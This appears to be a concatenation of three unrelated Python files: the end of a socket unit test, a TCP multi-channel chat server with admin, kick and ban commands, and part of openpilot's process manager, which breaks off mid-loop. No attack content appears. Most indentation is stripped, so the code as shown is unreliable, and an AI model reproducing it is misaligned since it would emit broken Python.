self.addCleanup(t.join)
s = socket.socket(self.family, socket.SOCK_STREAM)
s.settimeout(.2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except socket.error:
pass
finally:
s.close()
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (HOST, 0)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 support required')
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required')
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = support.TESTFN
def tearDown(self):
unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
if __name__ == "__main__":
unittest.main()
|
server.py
|
from socket import AF_INET, socket, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR
from threading import Thread
from re import match
# A few colors that will be used in text messaging. This is not compatible with the Windows Terminal.
# You might try using Cmder instead (or any terminal compatible with ANSI Escape Sequences).
COLOR_SUPERADMIN = '\033[95m'
COLOR_ADMIN = '\033[91m'
COLOR_DEFAULT = '\033[39m'
COLOR_SYS = '\033[92m'
STYLE_DIM = '\033[2m'
STYLE_DIM_RESET = '\033[22m'
class Channel:
    ''' A channel, with a name and some members.
• Attributes:
name: Its name, used by users to find the channel
members: All members, admins included
admins: Only the admin members '''
def __init__(self, name):
self.name = name
self.members = []
self.admins = []
class User:
    ''' A client socket, together with related information and helper methods.
• Class attributes:
instances: A list of all the instances of the User class.
channels: A list of all channels' names.
banned: A list of all banned users.
• Attributes:
        sock: The socket used for listening to and sending data to the client.
address: The user's address. Used for banning someone.
nickname: Its nickname.
        format_nick: The nickname, formatted (admins are in red, the superadmin in magenta and others in the default color).
current: The current channel.
superadmin: Is this user a superadministrator?
• Methods:
        switch: Change the user's current channel.
        find_channel: Search for a channel by name and return the channel object (or None if nothing is found).
        find_user: Search for a user by nickname and return the user object (or None if nothing is found).
        change_nick: Change the user's nickname.
        refresh_format_nick: Refresh the formatted nickname (useful if the person was granted admin or is no longer admin).
        kick: Kick a user out of the current channel. They go back to the MAIN channel.
        recv: Wait to receive data from the user. This is the waiting state of the main loop used in handle_user.
        send: Send a message to the user. Pass "sys = False" to display the message as a user message instead of a system one.
        send_channel: Send a message to everyone on the channel. Pass "to_self = False" to avoid sending the message to yourself.
        send_channels: Send a message to all channels the user has joined. Pass "to_current = False" to avoid sending it to the current channel.
        send_all: Send a message to everyone on the server.
'''
instances = []
channels = [Channel('VOID'), Channel('MAIN')]
banned = []
def __init__(self, sock, address):
self.sock = sock
self.address = address[0]
self.nickname = None
self.format_nick = ''
self.current = self.find_channel('VOID')
self.current.members += [self]
self.superadmin = False
self.instances.append(self)
def find_channel(self, name):
for channel in self.channels:
if channel.name == name:
return channel
def find_user(self, nick):
for user in self.current.members:
if user.nickname == nick:
return user
def switch(self, channel):
self.current = channel
self.refresh_format_nick()
# Alert everyone on the channel that the user has joined.
self.send('You are now in the channel "' + channel.name + '".\n')
self.send_channel(self.format_nick + ' has joined the channel!', to_self = False, to_currents_only = True)
def change_nick(self, nickname):
# Make sure the nickname has a correct form (alphanumerical characters only and no spaces)
if not bool(match('^[a-zA-Z0-9]+$', nickname)):
self.send('Error: Your name must only contain letters, numbers, and no spaces. Please retry.')
        # Make sure the nickname isn't already in use
elif nickname in [user.nickname for user in self.instances]:
self.send('Error: This name is already taken. Please choose another one.')
else:
old_nickname = self.format_nick
self.nickname = nickname
self.refresh_format_nick()
self.send('Your nickname is now ' + self.format_nick + '.')
self.send_channels(old_nickname + ' changed its name to ' + self.format_nick + '.', to_self = False)
def refresh_format_nick(self):
if self.superadmin:
self.format_nick = COLOR_SUPERADMIN + self.nickname + COLOR_SYS
elif self in self.current.admins:
self.format_nick = COLOR_ADMIN + self.nickname + COLOR_SYS
else:
self.format_nick = COLOR_DEFAULT + self.nickname + COLOR_SYS
def kick(self, nick):
for user in self.current.members:
if user.nickname == nick:
if not user.superadmin:
# If the user is not on the MAIN channel, make it leave the current channel and switch to MAIN channel instead.
channel = self.find_channel('MAIN')
if user.current != channel:
user.send('You have been kicked from ' + user.current.name + ' by ' + self.format_nick + '.')
old_channel = user.current
user.switch(channel)
# Remove the user from the previous channel
if user in old_channel.members: old_channel.members.remove(user)
if user in old_channel.admins: old_channel.admins.remove(user)
else:
if self.superadmin:
self.send(user.format_nick + ' cannot be kicked because it is already on channel "Main".\nMaybe try the command /TIMEOUT or /BAN instead.')
else:
self.send(user.format_nick + ' cannot be kicked because it is already on channel "Main".\nMaybe ask a SuperAdmin for help.')
return
else:
self.send('You are not allowed to kick a SuperAdmin!')
return
        self.send(nick + ' is not currently connected or not on this channel.')
def recv(self):
return self.sock.recv(buffer_size).decode('utf8')
def send(self, msg, sys = True):
if sys: msg = COLOR_SYS + msg + '\n' + COLOR_DEFAULT
try:
self.sock.send(bytes(msg + '\n', 'utf8'))
except Exception:
del_user(self)
    def send_channel(self, msg, sys = True, to_self = True, to_non_currents_only = False, to_currents_only = False):
        for user in self.current.members:
            # Honour to_self = False by skipping the sender
            if not to_self and user is self:
                continue
            if to_non_currents_only and user.current != self.current:
                user.send(msg, sys)
            elif to_currents_only and user.current == self.current:
                user.send(msg, sys)
            elif not to_non_currents_only and not to_currents_only:
                user.send(msg, sys)
def send_channels(self, msg, sys = True, to_self = True, to_current = True, to_MAIN = True):
sender_channels = []
for channel in self.channels:
if self in channel.members:
if (channel != self.current or to_current) and (channel.name != 'MAIN' or to_MAIN):
sender_channels += [channel]
for user in self.instances:
if user.current in sender_channels:
if user.nickname != self.nickname or to_self:
user.send(msg, sys)
def send_all(self, msg, sys = True, to_self = True):
for user in self.instances:
if user.nickname != self.nickname or to_self:
user.send(msg, sys)
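# Illustrative sketch only (not part of the original file): how the send_*
# helpers documented in the User docstring are meant to be combined. It
# assumes "u" is an already-connected User instance; nothing below is called
# anywhere in this module.
def _example_send_helpers(u):
    u.send('Only you see this, formatted as a system message.')
    u.send('A plain chat-style line, no system colour.', sys = False)
    u.send_channel(u.format_nick + ' says hi!', to_currents_only = True)
    u.send_channels('Visible in every channel ' + u.nickname + ' has joined.', to_self = False)
    u.send_all('A server-wide announcement.')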
def del_user(user):
    '''Delete an outgoing user: remove them from everywhere before closing the connection.'''
user.send_channels(user.format_nick + ' has left the chat.', to_self = False)
for channel in user.channels:
if user in channel.members: channel.members.remove(user)
if user in channel.admins: channel.admins.remove(user)
user.sock.close()
if user in user.instances: user.instances.remove(user)
def accept_incoming_connections():
'''Sets up handling for incoming clients.'''
while True:
client, client_address = server.accept()
user = User(client, client_address)
if user.address not in user.banned:
print(user.address + ' has connected.')
Thread(target=handle_user, args=(user,)).start()
else:
print(user.address + ' tried to connect, but it is banned.')
            user.send('You are banned from this server.')
del_user(user)
def handle_user(user):
'''Handles a single user.'''
if len(user.instances) == 1:
user.superadmin = True
user.send('Welcome, you are the first connected on the chat.\nThus, by the rules of this kingdom,\nyou shall be granted the title of ' + COLOR_SUPERADMIN + 'SuperAdmin.' + COLOR_SYS)
user.send('Please, allow me to ask for your name, Your Majesty...')
else:
user.send('Welcome! Please type your name and then press enter!')
# Continue to ask if the nickname proposed isn't acceptable.
while user.nickname == None:
        # If the connection has been lost, properly delete the user and stop the loop.
try: proposed_name = user.recv()
except Exception:
print(user.address + ' was forcibly closed by the remote host.')
del_user(user)
return
user.change_nick(proposed_name)
user.send('Welcome ' + user.format_nick + '! You can type /HELP to display all available commands.')
user.current.members.remove(user)
# Add the user to MAIN
channel = user.find_channel('MAIN')
channel.members += [user]
if user.superadmin: channel.admins += [user]
user.switch(channel)
# The main loop. While the connection is established
while True:
        # If the connection has been lost, properly delete the user and stop the loop.
try: msg = user.recv()
except Exception:
print(user.address + ' was forcibly closed by the remote host.')
del_user(user)
break
# We have received a message from the user. Let's handle every command he might use.
if msg == '[COMMAND] HELP':
tmp = 'SuperAdmins have a ' + COLOR_SUPERADMIN + 'magenta name' + COLOR_SYS
tmp += ', admins have a ' + COLOR_ADMIN + 'red name' + COLOR_SYS + ', private message are ' + STYLE_DIM + 'shown dimmed.\n'+ STYLE_DIM_RESET
tmp += 'Here is the list of all available commands:\n'
tmp += ' - /HELP: print this message.\n'
tmp += ' - <message>: send a message in current channel.\n'
tmp += ' - /LIST: list all available channels on server.\n'
tmp += ' - /JOIN <channel>: join (or create) a channel.\n'
tmp += ' - /LEAVE: leave current channel.\n'
tmp += ' - /WHO: list users in current channel.\n'
tmp += ' - /MSG <nick1;nick2;...> <message>: send a private message to user(s) in the current channel.\n'
tmp += ' - /BYE: disconnect from server.\n'
tmp += ' - /CURRENT: print the current channel, and the channel you are member of.\n'
tmp += ' - /CURRENT <channel>: set current channel.\n'
tmp += ' - /NICK <nick>: change user nickname on server.\n'
if user in user.current.admins:
                tmp += '\nAdmins also have access to the following commands:\n'
tmp += ' - /KICK <nick>: kick user from current channel.\n'
tmp += ' - /REN <channel>: change the current channel name.\n'
tmp += ' - /GRANT <nick>: grant admin privileges to a user.\n'
tmp += ' - /REVOKE <nick>: revoke admin privileges.\n'
if user.superadmin:
                    tmp += '\nSuperAdmins also have access to the following commands:\n'
                    tmp += ' - /SHOUT <message>: send a public message to everyone, regardless of the channel.\n'
                    tmp += ' - /BAN <nick>: forbid an IP address from connecting to the server.\n'
else:
tmp += '\nYou will need the help of a SuperAdmin to ban a disrespectful user.\n'
user.send(tmp)
elif msg == '[COMMAND] LIST':
tmp = 'Here are all available channels:\n'
for channel in user.channels:
if channel.name != 'VOID': tmp += ' - ' + channel.name + '\n'
user.send(tmp)
elif msg[:len('[COMMAND] JOIN ')] == '[COMMAND] JOIN ':
desired_channel = msg[len('[COMMAND] JOIN '):]
channel = user.find_channel(desired_channel)
# If channel doesn't exist, create it and become admin of this channel
if channel == None:
# Except if the name is invalid
if not bool(match('^[a-zA-Z0-9]+$', desired_channel)):
user.send('Error: A channel\'s name must only contain letters, numbers, and no spaces. Please retry.')
else:
new_channel = Channel(desired_channel)
user.channels += [new_channel]
new_channel.members += [user]
new_channel.admins += [user]
user.switch(new_channel)
# Forbid user to go to VOID
elif channel.name == 'VOID':
                user.send('Error: This channel cannot be accessed. Please try something else.')
# If the user isn't part of the channel, it joins it
elif user not in channel.members:
channel.members += [user]
# Add the superadmins in the desired channel admins if it's not already the case
if user.superadmin and user not in channel.admins: channel.admins += [user]
user.switch(channel)
else:
                user.send('Error: You already joined this channel. Use /CURRENT ' + channel.name + ' to change your current channel.')
elif msg == '[COMMAND] LEAVE':
if user.current.name != 'MAIN':
old_channel = user.current
user.send_channel(user.format_nick + ' has left the channel.', to_self = False, to_currents_only = True)
user.switch(user.find_channel('MAIN'))
# Remove the user from the previous channel
if user in old_channel.members: old_channel.members.remove(user)
if user in old_channel.admins: old_channel.admins.remove(user)
                # If there is no longer any member in the old channel, remove the channel.
if len(old_channel.members) == 0: user.channels.remove(old_channel)
else:
user.send('You cannot leave while being in the MAIN channel. If you wish to leave, use the command /BYE.')
elif msg == '[COMMAND] WHO':
tmp = 'Here are all users in "' + user.current.name + '":\n'
for client in user.current.members:
tmp += ' - ' + client.format_nick + '\n'
user.send(tmp)
elif msg[:len('[COMMAND] MSG ')] == '[COMMAND] MSG ':
tmp = msg[len('[COMMAND] MSG '):]
# Separate all the different recipients included in the command.
user_to_send = []
index = tmp.find(';')
while index != -1:
user_to_send += [tmp[:index]]
tmp = tmp[index + 1:]
index = tmp.find(';')
index = tmp.find(' ')
if index == -1:
user.send('Error: Improper usage of the command MSG.\n* /MSG <nick1;nick2;...> <message>: send a private message to one or several user(s) in current channel')
else:
user_to_send += [tmp[:index]]
tmp = tmp[index + 1:]
                # Once done, send the message to all of them, using a different appearance to differentiate them from normal messages.
for e in user_to_send:
result = user.find_user(e)
if result != None:
user.send(STYLE_DIM + 'To ' + result.format_nick + COLOR_DEFAULT + ': ' + tmp + STYLE_DIM_RESET, sys = False)
result.send(STYLE_DIM + 'From ' + user.format_nick + COLOR_DEFAULT + ': ' + tmp + STYLE_DIM_RESET, sys = False)
else:
user.send(e + ' is not currently connected or is not in your current channel.')
elif msg == '[COMMAND] BYE':
print(user.address + ' has left.')
user.send('Goodbye ' + user.format_nick + '!')
del_user(user)
break
elif msg == '[COMMAND] CURRENT':
tmp = 'You are currently in the channel "' + user.current.name + '".\n'
tmp += 'You are also member of the following channels:\n'
for channel in user.channels:
if user in channel.members and channel.name != user.current.name:
tmp += ' - ' + channel.name + '\n'
user.send(tmp)
elif msg[:len('[COMMAND] CURRENT ')] == '[COMMAND] CURRENT ':
desired_channel = msg[len('[COMMAND] CURRENT '):]
tmp = user.find_channel(desired_channel)
if tmp != None:
if user in tmp.members:
if user.current != tmp:
user.switch(tmp)
else:
user.send('Error: You are already in this channel.')
else:
                    user.send('Error: You are not a member of this channel. Use /JOIN ' + tmp.name + ' to join this channel.')
else:
                user.send('Error: This channel does not exist. You can create it using the command /JOIN ' + desired_channel)
elif msg[:len('[COMMAND] NICK ')] == '[COMMAND] NICK ':
desired_nickname = msg[len('[COMMAND] NICK '):]
user.change_nick(desired_nickname)
elif msg[:len('[COMMAND] GRANT ')] == '[COMMAND] GRANT ':
desired_admin = msg[len('[COMMAND] GRANT '):]
if user in user.current.admins:
result = user.find_user(desired_admin)
if result != None:
if result not in result.current.admins:
result.current.admins += [result]
result.refresh_format_nick()
result.send(user.format_nick + ' granted you the Admin title!')
result.send_channel(result.format_nick + ' is now Admin.', to_self = False)
else:
user.send(desired_admin + ' is already Admin.')
else:
user.send(desired_admin + ' is not currently connected or is not in your current channel.')
else:
user.send('You are not allowed to use this command!')
elif msg[:len('[COMMAND] REVOKE ')] == '[COMMAND] REVOKE ':
desired_admin = msg[len('[COMMAND] REVOKE '):]
if user in user.current.admins:
result = user.find_user(desired_admin)
if result != None:
if result in result.current.admins:
if not result.superadmin:
result.current.admins.remove(result)
result.refresh_format_nick()
result.send(user.format_nick + ' revoked your Admin title!')
result.send_channel(result.format_nick + ' is no longer an Admin.', to_self = False)
else:
user.send('You are not allowed to revoke a SuperAdmin!')
else:
user.send(desired_admin + ' is not an Admin.')
else:
user.send(desired_admin + ' is not currently connected or is not in your current channel.')
else:
user.send('You are not allowed to use this command!')
elif msg[:len('[COMMAND] KICK ')] == '[COMMAND] KICK ':
desired_nickname = msg[len('[COMMAND] KICK '):]
if user in user.current.admins:
user.kick(desired_nickname)
else:
user.send('You are not allowed to use this command!')
elif msg[:len('[COMMAND] REN ')] == '[COMMAND] REN ':
desired_name = msg[len('[COMMAND] REN '):]
if user in user.current.admins:
if user.current.name != 'MAIN':
                    user.send_channel('This channel is now called ' + desired_name, to_currents_only = True)
                    user.send_channel('The channel ' + user.current.name + ' is now called ' + desired_name, to_non_currents_only = True)
user.current.name = desired_name
else:
user.send('You cannot change the channel "MAIN" name.\nSorry, even admin\'s powers have limits.')
else:
user.send('You are not allowed to use this command!')
elif msg[:len('[COMMAND] SHOUT ')] == '[COMMAND] SHOUT ':
desired_msg = msg[len('[COMMAND] SHOUT '):]
if user.superadmin:
user.send_all('\n\n' + desired_msg)
else:
user.send('You are not allowed to use this command!')
elif msg[:len('[COMMAND] BAN ')] == '[COMMAND] BAN ':
desired_user = msg[len('[COMMAND] BAN '):]
if user.superadmin:
result = user.find_user(desired_user)
if result != None:
result.send('You have been banned from this server by ' + user.format_nick + '!')
user.send_all(result.format_nick + ' has been banned from this server')
user.banned += [result.address]
del_user(result)
else:
                    user.send(desired_user + ' is not currently connected or is not in your current channel.')
else:
user.send('You are not allowed to use this command!')
elif msg[:len('[COMMAND] ')] == '[COMMAND] ':
user.send('The command /' + msg[len('[COMMAND] '):] + ' is not recognized.\nYou can type /HELP to display all available commands.')
# If the message isn't a command, it must be a normal message. Sends it to everyone on all the channels the user has joined.
else:
user.send_channel(user.format_nick + COLOR_DEFAULT + ': ' + msg, sys = False, to_currents_only = True)
user.send_channel('[' + user.current.name + '] ' + user.format_nick + COLOR_DEFAULT + ': ' + msg, sys = False, to_non_currents_only = True)
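# Illustrative sketch only (not part of the original file): a minimal client
# for the wire protocol handled above. Commands travel as plain UTF-8 text
# prefixed with "[COMMAND] "; anything else is a chat message for the current
# channel. The host, port and nickname used here are assumptions, matching the
# defaults configured just below.
def _example_client(server_host = '127.0.0.1', server_port = 1459):
    from time import sleep
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((server_host, server_port))
    print(s.recv(1500).decode('utf8'))   # welcome banner / nickname prompt
    for line in ('Alice', '[COMMAND] JOIN general', 'Hello everyone!', '[COMMAND] BYE'):
        s.send(bytes(line, 'utf8'))
        sleep(0.2)                        # keep messages in separate packets
        print(s.recv(1500).decode('utf8'))
    s.close()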
host = ''
port = 1459
buffer_size = 1500
server = socket(AF_INET, SOCK_STREAM)
server.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
server.bind((host, port))
server.listen(10)
print('The server has successfully launched. Now waiting for client connections...')
thread = Thread(target=accept_incoming_connections)
thread.start()
thread.join()
server.close()
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR, PARAMS
from common.hardware import HARDWARE, ANDROID, PC
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1005
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
    # whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
from common.text_window import TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner(noop=(__name__ != "__main__" or not ANDROID))
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
sys.exit(1)
else:
        # Build failed, log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
no_ui = __name__ != "__main__" or not ANDROID
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s, noop=no_ui) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if not PC:
persistent_processes += [
'logcatd',
'tombstoned',
]
if ANDROID:
persistent_processes += [
'updated',
'deleter',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'dmonitoringd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if WEBCAM:
car_started_processes += [
'dmonitoringmodeld',
]
if not PC:
car_started_processes += [
'sensord',
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'gpsd',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
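# Illustrative sketch only: how an external module could hook its own process
# into the manager via register_managed_process(). "exampled" and
# "selfdrive.example.exampled" are hypothetical names, not real processes in
# this codebase, and the function below is never called here.
def _example_register():
  # python process, started and stopped with the car like car_started_processes
  register_managed_process("exampled", "selfdrive.example.exampled", car_started=True)
  # native process: (directory relative to BASEDIR, argv list), kept persistent
  register_managed_process("exampled_native", ("selfdrive/example", ["./exampled_native"]))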
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
# TODO: Use method from HARDWARE
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
